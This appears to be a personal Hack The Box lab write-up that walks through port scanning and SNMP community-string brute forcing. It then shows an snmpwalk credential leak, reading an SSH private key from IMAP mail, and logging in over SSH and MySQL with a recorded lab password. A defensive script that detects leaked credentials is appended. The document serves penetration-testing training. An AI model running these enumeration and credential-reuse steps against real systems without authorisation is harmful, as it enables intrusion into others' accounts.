# Creds

HTB: tom:NMds732Js2761

# Enumeration

## Nmap Scans

- fast nmap: `sudo nmap -p- --min-rate 5000 10.129.202.20 -oN nmap-fast`
  ![[images/Pasted image 20250924190217.png]]
- detailed scan: `sudo nmap -p22,110,143,993,995 -sC -sV 10.129.202.20 -oN nmap-services-1`
  ![[images/Pasted image 20250924190415.png]]
- udp fast scan: `sudo nmap -p- -sU --min-rate 5000 10.129.202.20 -oN nmap--udp-fast`
  ![[images/Pasted image 20250924190747.png]]
- imap/pop scan: `sudo nmap 10.129.202.20 -p110,143,993,995 -sC -sV` - nothing new
  ![[images/Pasted image 20250924192805.png]]

## Services

### SSH (22)

- pubkey and password auth available - potential brute force?
- `./ssh-audit.py 10.129.202.20`
  ![[images/Pasted image 20250924192259.png]]
- logging in to SSH as tom requires public-key auth, so we need tom's key
  ![[images/Pasted image 20250924195733.png]]

### pop3 (110,995)

- `curl -k 'pop3s://10.129.202.20' -v` - issuer CN=NIXHARD
  ![[images/Pasted image 20250924191649.png]]
- `sudo openssl s_client -connect 10.129.202.20:pop3s` - cannot issue commands without a password
  ![[images/Pasted image 20250924191438.png]]

### imap (143,993)

- `curl -k 'imaps://10.129.202.20' --user HTB -v` - missing password; CN=NIXHARD
  ![[images/Pasted image 20250924190945.png]]
- `sudo openssl s_client -connect 10.129.202.20:imaps` - cannot issue commands without a password
  ![[images/Pasted image 20250924191327.png]]

### snmp (udp161)

- `sudo nmap -sC -sV -p161 -sU 10.129.202.20`
  ![[images/Pasted image 20250924193009.png]]
- `sudo snmpwalk -v2c -c public 10.129.202.20 > snmp.txt` - getting a timeout, because it's UDP 161?
- `sudo nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.129.202.20`
  ![[images/Pasted image 20250924193640.png]]
- `onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.129.202.20` - community string = `backup`; try it with snmpwalk
  ![[images/Pasted image 20250924195300.png]]
- `snmpwalk -v2c -c backup 10.129.202.20`
  ![[images/Pasted image 20250924195442.png]]
- ...
  ![[images/Pasted image 20250924195529.png]]
- creds for tom leaked

# foothold/exploit

- leverage tom's creds to access imap: `openssl s_client -connect 10.129.202.20:imaps`
- the Important inbox is empty, but INBOX has tom's private key
  ![[images/Pasted image 20250924200731.png]]
- `sudo chmod 600 id_rsa`
- `sudo ssh -i ./id_rsa tom@10.129.202.20` - we're in!
  ![[images/Pasted image 20250924201021.png]]
  ![[images/Pasted image 20250924201524.png]]
- another user named cry0l1t3
- `ls -al /home/tom`
  ![[images/Pasted image 20250924202225.png]]
- let's look into `.mysql_history`
  ![[images/Pasted image 20250924202309.png]]
- tom has been playing in the mysql db
- connect to mysql: `mysql -u tom -pNMds732Js2761`
  ![[images/Pasted image 20250924202120.png]]
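Both leaks in these notes (a credential readable through SNMP and a password typed on the `mysql` command line, which then lands in `.mysql_history` and the process list) can be found with one audit pass over walk output and history files. The Python below is an added example, not part of the original notes; the snmpwalk and history lines are constructed samples, and the patterns are an assumption about the common shapes such secrets take.

```python
import re
from typing import List, Tuple

# Constructed sample inputs (not the output captured in these notes).
SNMPWALK_SAMPLE = """\
HOST-RESOURCES-MIB::hrSWRunParameters.1234 = STRING: "-u backup -pS3cretBackup!"
HOST-RESOURCES-MIB::hrSWRunParameters.1235 = STRING: "--config /etc/app.conf"
SNMPv2-MIB::sysDescr.0 = STRING: Linux NIXHARD 5.10.0 x86_64
"""

MYSQL_HISTORY_SAMPLE = """\
show databases;
mysql -u alice -pWinterIs2Cold
CREATE USER 'svc'@'localhost' IDENTIFIED BY 'svcPass123';
select * from users;
"""

# Each pattern's last capture group is the secret. A bare "-p" that prompts
# interactively has no value after it and therefore does not match.
CRED_PATTERNS = [
    ("inline -p password", re.compile(r"-u\s*([^\s\"']+)\s+-p([^\s\"']+)")),
    ("IDENTIFIED BY", re.compile(r"IDENTIFIED BY\s+'([^']+)'", re.IGNORECASE)),
    ("password= key/value", re.compile(r"pass(?:word|wd)?\s*=\s*['\"]?([^\s'\"]+)", re.IGNORECASE)),
]


def redact_line(line: str, match) -> str:
    """Mask the secret (the last capture group) so findings can be reported safely."""
    start, end = match.span(match.lastindex)
    return line[:start] + "***" + line[end:]


def find_leaked_credentials(text: str, source: str) -> List[Tuple[str, int, str, str]]:
    """Return (source, line number, pattern label, redacted line) for each exposing line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in CRED_PATTERNS:
            match = pattern.search(line)
            if match:
                hits.append((source, lineno, label, redact_line(line, match)))
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for hit in (find_leaked_credentials(SNMPWALK_SAMPLE, "snmpwalk")
                + find_leaked_credentials(MYSQL_HISTORY_SAMPLE, ".mysql_history")):
        print(hit)
```

Run it over a real `snmpwalk` capture or a user's `~/.mysql_history` / `~/.bash_history` to confirm nothing credential-shaped is exposed after remediation (use a non-default community string, and pass `-p` without a value so the client prompts).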